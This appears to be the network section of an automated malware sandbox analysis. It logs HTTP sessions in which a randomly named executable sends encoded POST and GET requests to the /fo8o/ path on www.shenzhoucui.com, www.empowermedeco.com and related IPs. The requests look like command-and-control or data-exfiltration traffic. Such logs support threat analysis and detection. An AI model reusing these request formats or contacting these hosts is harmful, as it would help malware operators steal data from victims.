Y8F=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4cQ [TRUNCATED]
Jun 26, 2024 14:57:56.433873892 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 26 Jun 2024 12:57:56 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	65254	217.196.55.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:58.399074078 CEST	520	OUT	GET /fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:57:58.954150915 CEST	1222	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 26 Jun 2024 12:57:58 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0 platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	65255	104.206.198.212	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:20.623635054 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 34 43 61 43 67 70 4e 58 2f 2f 63 53 76 4a 50 63 34 4e 4e 6a 34 37 79 63 59 39 69 5a 2f 4a 67 53 76 49 4b 46 76 53 38 3d Data Ascii: Y8F=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ4CaCgpNX//cSvJPc4NNj47ycY9iZ/JgSvIKFvS8=
Jun 26, 2024 14:58:21.233191013 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Jun 2024 12:58:23 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	65256	104.206.198.212	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:23.167841911 CEST	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 65 6b 49 75 71 75 75 35 42 37 31 72 61 31 78 46 70 5a 67 43 33 66 72 46 67 58 46 62 77 41 32 73 6a 75 42 68 2b 55 Data Ascii: Y8F=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbekIuquu5B71ra1xFpZgC3frFgXFbwA2sjuBh+U
Jun 26, 2024 14:58:23.778795958 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Jun 2024 12:58:25 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	65257	104.206.198.212	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:25.694330931 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 64 72 68 35 66 76 77 64 74 7a 34 35 57 37 4d 76 66 4b 79 66 4e 58 36 35 61 46 35 46 56 33 69 51 75 74 6d 56 49 53 42 2f 49 49 6c 74 37 31 4d 6c 62 59 79 46 6d 31 2b 47 64 50 69 79 31 34 63 77 6c 77 32 70 4e 5a 32 35 2f 47 49 4b 33 49 36 68 72 58 50 31 43 4e 71 45 4a 48 64 35 52 64 57 63 37 68 30 4b 75 37 6e 64 41 42 61 50 39 5a 46 55 69 66 4f 6f 43 51 78 54 55 52 6e 2b 78 77 76 41 62 73 78 4f 32 47 2f 6e 34 67 66 57 48 58 37 32 4c 54 31 36 55 56 6f 69 7a 30 58 73 77 34 68 64 67 4e 6c 58 [TRUNCATED] Data Ascii: Y8F=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqp8km4TzaZy4OaWceO0miiVQR6xtRXYs599kPFKcTFEHEEOYH1fCQcPn9y6deh+DtsMAo/+7uVrD6Kq5GrOjmc+9aFkh8I7oEIR2faad2/amimY8IstvH4Y6AWugakzu5drh5fvwdtz45W7MvfKyfNX65aF5FV3iQutmVISB/IIlt71MlbYyFm1+GdPiy14cwlw2pNZ25/GIK3I6hrXP1CNqEJHd5RdWc7h0Ku7ndABaP9ZFUifOoCQxTURn+xwvAbsxO2G/n4gfWHX72LT16UVoiz0Xsw4hdgNlXYqzVHDJoWa9Ul+ysVtK/o21NkPZf35pLxF6jKGBYi5tQVJV6QHDJHDr9ccSPE6YbhCMvWNhTlbuU+/2sydltwNlL0JF7ppXDP/jxKI1Alv25bfEbV77zNuG53yfqxqhdenTb2cgEkL/8x2QqsDRb6EohU3BnJe3/TbW30ygPi7XBwshHKdyXoEelaOjwC6pxj29hKJ3W4+2dkrUiL80H/W9O3FfSKvjKsKyhm7URRFLhgMHpu128FS7trHYB6NJy+hFyWUR7ykw+8OqXP+i20T3b+6mD2Zk9wzz7LzQIitr+6eSfxPys4XITuCIiTAIfh6R15ZDNbYYKsyLxB9BKEXq/KjOExvAyeWU3GWWB8tlR3asRaLkcddPMgRlnskWoU/cIHVCVfUa60XYWrZ4mZ1RNoDE1NUjj6d/2zFgS2Jolm2VoSDzoXtcDkHeG6cLcipPAObfweY+sXIxg4LIabFeN4hv2G19Pxhf4xILTjqvdzvoX8iKrdzP6vsXvcOGwsGT1MuXLZO0WMoURugkTDKTo7ILXYoLdnNaFRRkde1n5KaaucWgIBhgPEQjHxLw8/0JuPOBjXzDjqtbw8QCEuAKRODrvtv3V1ml2jZ8+dcpBJk+VkyPyySIB+4OBwx8pfpVhhme+gmW+Fry4uqefN+uTq+V5Cl98Dd [TRUNCATED]
Jun 26, 2024 14:58:26.301176071 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Jun 2024 12:58:28 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	65258	104.206.198.212	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:28.226299047 CEST	518	OUT	GET /fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.shenzhoucui.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:58:29.165178061 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Jun 2024 12:58:30 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Data Raw: 35 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 27 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 [TRUNCATED] Data Ascii: 59f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>app9570-\|</title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title='app9570-\|'>app9570-\|</a></h1><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>/fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0</td></tr><tr><td>Server:</td><td>prod-qwmh-bj7-pool202-frontend-static-01</td></tr><tr><td>Date:</td><td>2024/06/26 20:58:28</td></tr></table><hr><center>tengine</center><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shenzhoucui.com.xml" target="_blank">XML </a> \| <a href="/shenzhou [TRUNCATED]
